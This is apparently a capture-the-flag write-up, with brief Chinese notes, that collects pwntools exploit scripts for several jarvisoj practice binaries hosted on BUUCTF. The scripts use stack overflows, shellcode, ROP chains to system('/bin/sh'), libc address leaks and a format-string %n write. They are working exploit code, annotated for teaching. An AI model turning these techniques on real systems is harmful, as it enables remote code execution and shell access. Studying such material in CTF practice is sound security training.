BUUCTF jarvisoj exp整合

0x01 jarvisoj_level0

 簡單的地址改寫

from pwn import *

# Connect to the CTF practice target; the commented-out process() line is the
# author's local-debugging variant of the same script.
p = remote('node3.buuoj.cn', 26882)
#p = process('./level0')

# Fixed address taken from the challenge binary by the author (not derivable
# from this script). A non-PIE binary is what makes a hard-coded address usable.
shell_addr = 0x0000000000400596

# 0x88 bytes of filler followed by one 8-byte value; by the variable name this
# is presumably the saved return address being replaced - confirm against the
# binary's stack layout. Python 2 only: under Python 3 'a'*0x88 is str and
# p64() returns bytes, so this concatenation raises TypeError.
p.sendline('a'*0x88+p64(shell_addr))

p.interactive()

0x01 jarvisoj_level2

下面的代碼本地可行,但遠程由於數據接收順序有問題,可以用jarvisoj_level3的payload稍作修改使用。

from pwn import *
# Have pwntools print every byte sent and received, which is how the
# receive-order problem mentioned above this script would show up.
context.log_level = 'debug'

p = remote('node3.buuoj.cn', 29661)
#p = process('level1')
# The program prints a stack address after the text 'this:'; the next 10
# characters are parsed as hex (int(..., 16) accepts a leading '0x').
# The write-up notes the remote service delivers this output in a different
# order, so this recvuntil/recv pairing is what breaks remotely.
p.recvuntil('this:')
buf_addr = int(p.recv(10), 16)
print hex(buf_addr)   # Python 2 print statement; this file is Python 2 throughout

# Assemble pwntools' stock shell payload for whatever context.arch is in
# effect (this script never sets it, so the pwntools default applies).
payload = asm(shellcraft.sh())
# Pad with NULs to 0x8C bytes, then append the leaked buffer address, so the
# overwritten pointer presumably points back at the payload itself - TODO
# confirm offset against the binary. This only works on a stack that is
# mapped executable; NX alone defeats it.
payload = payload.ljust(0x8C, '\x00')
payload += p32(buf_addr)


p.sendline(payload)
p.interactive()

0x02 jarvisoj_level2

 簡單的rop,所需的地址直接在可執行文件中找到

from pwn import *

p = remote('node3.buuoj.cn', 26369)

# Both addresses were read out of the challenge binary by the author; they are
# constants here, which is only possible because the binary is not PIE.
bin_sh = 0x0804A024
system_addr = 0x08048320

# After 0x8C bytes of filler the three 4-byte values are laid out as
# callee address, a dummy return address (0), then the first argument -
# the i386 stack calling convention. The dummy 0 means the process will
# crash if system() ever returns.
p.sendline('a'*0x8C + p32(system_addr) + p32(0) + p32(bin_sh))

p.interactive()

0x03 jarvisoj_level2_x64

 64位的

from pwn import *

# Print all traffic on the connection.
context.log_level = 'debug'

p = remote('node3.buuoj.cn', 27014)
#p = process('./level2_x64')
# ELF() parses the binary, so a copy of ./level2_x64 must exist locally even
# when attacking the remote service.
elf = ELF('./level2_x64')

# Gadget address and string address were taken from the binary by the author;
# the PLT entry is resolved from the ELF headers instead of hard-coded.
pop_rdi = 0x00000000004006B3
system_plt = elf.plt['system']
str_sh = 0x0000000000600A90

# Wait for the prompt, then send 0x88 bytes of filler followed by a three-entry
# chain: the gadget loads str_sh into rdi (first argument on x86-64), then
# control goes to system@plt. Python 2 only: str + bytes concatenation.
p.recvuntil('Input:\n')
p.sendline('a'*0x88 + p64(pop_rdi) + p64(str_sh) + p64(system_plt))

p.interactive()

0x04 jarvisoj_level3

 泄露libc基址,構造rop

from pwn import *
# LibcSearcher is a third-party package (not stdlib, not pwntools); it maps a
# leaked function address to a known libc build and reports symbol offsets.
from LibcSearcher import *

#p = process('./level3')
p = remote('node3.buuoj.cn', 26763)
# Parses the local copy of the binary to resolve PLT/GOT entries.
elf = ELF('level3')

read_got = elf.got['read']
write_plt = elf.plt['write']
# Address of the vulnerable function, taken from the binary by the author;
# the chain returns here so a second payload can be sent.
vul_addr = 0x0804844B


# Stage 1: after 0x8C bytes of filler, call write@plt with return address
# vul_addr and arguments (1, read_got, 4), i.e. print the 4-byte GOT entry
# of read() to stdout. The leak is what sidesteps ASLR for the libc mapping;
# a non-PIE binary is what makes the fixed GOT/PLT addresses usable.
payload = 'a'*0x8C +p32(write_plt) + p32(vul_addr) + p32(1) + p32(read_got) + p32(4)
p.sendlineafter('Input:\n', payload)

# Read the 4 leaked bytes back as a little-endian 32-bit address.
read_addr = u32(p.recv(4))
# NOTE(review): if several libc builds match the leak, LibcSearcher prompts
# for a choice; nothing here handles that case - confirm for this target.
libc = LibcSearcher('read', read_addr)

libc_base = read_addr - libc.dump('read')

system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
# Stage 2: same filler, then system(), a dummy return address (0), and the
# "/bin/sh" string address as its argument (i386 convention).
payload = 'a'*0x8C + p32(system_addr) + p32(0) +p32(str_bin_sh)

p.sendlineafter('Input:\n', payload) 

p.interactive()

0x05 jarvisoj_level4

和 jarvisoj_level3一樣,只有輸入有些差別。

0x06 jarvisoj_level3_x64

from pwn import *
# Third-party libc-identification helper (see the level3 script above).
from LibcSearcher import *
context.log_level = 'debug'

p = remote('node3.buuoj.cn', 26368)
# Needs a local copy of the binary to resolve PLT/GOT addresses.
elf = ELF('./level3_x64')

# Addresses taken from the binary by the author. pop_rsi_r15_ret pops TWO
# registers, which is why a dummy 0 follows write_got in the chain.
vul_addr = 0x00000000004005E6
pop_rdi_ret = 0x00000000004006b3
pop_rsi_r15_ret = 0x00000000004006b1
write_got = elf.got['write']
write_plt = elf.plt['write']

# Stage 1: after 0x88 bytes of filler, set rsi = write_got (r15 = 0 as a
# throwaway), rdi = 1, call write@plt, then return to vul_addr for a second
# round. Nothing in the chain sets rdx, so the byte count of the write is
# whatever rdx happened to hold; the script only consumes 6 bytes of it.
payload = 'a'*0x88 + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(pop_rdi_ret) + p64(1) + p64(write_plt) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)

# 6 leaked bytes, zero-extended to 8 and decoded as little-endian; this
# presumes the top two bytes of the address are zero - TODO confirm.
write_addr = u64(p.recv(6).ljust(8, '\x00'))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')

system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')


# Stage 2: rdi = "/bin/sh" address, then system(); vul_addr is the return
# address after system(). Same filler length as stage 1.
payload = 'a'*0x88 + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)

p.interactive()

0x07 jarvisoj_fm

 簡單的格式化字符串,找到棧的偏移量,向x寫入4就行。

from pwn import *
p = remote('node3.buuoj.cn', 27369)
# p = process('./fm')
# Loaded but never used by this script; the address below is hard-coded.
elf = ELF('./fm')
# Address of the global the author wants to change (read from the binary).
x_addr = 0x0804A02C

# Format-string write: the 4-byte address goes first, and '%11$n' stores the
# number of characters printed so far (4, the address itself) through the
# pointer found at positional argument 11 - the stack offset the author
# located, as the text above this script says. This only works because the
# program passes user input straight to printf as the format argument; a
# fixed format string plus -Wformat-security is the fix on the program side.
payload = p32(x_addr) + '%11$n'
p.sendline(payload)
p.interactive()


